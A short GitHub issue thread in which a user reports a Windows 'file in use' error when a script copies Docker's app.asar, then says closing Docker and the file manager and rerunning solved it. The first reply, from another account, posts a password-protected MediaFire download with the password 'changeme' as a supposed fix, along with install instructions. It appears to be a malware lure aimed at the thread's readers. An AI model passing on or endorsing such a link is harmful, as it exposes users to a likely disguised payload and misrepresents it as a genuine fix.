### ISSUE TITLE
执行后python ddcs.py

### ISSUE THREAD

**Issue by chiangbar** [asxez/DDCS#4]
文件复制时出错: [WinError 32] 另一个程序正在使用此文件，进程无法访问。: 'C:\\Program Files\\Docker\\Docker/frontend/resources/app.asar'

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by chiangbar** [comment]
自己已经出了好了,关闭docker和文件管理器,重新运行就可以了

**Comment by chiangbar** [comment]
自己已经修复好了,关闭docker和文件管理器,重新运行即可
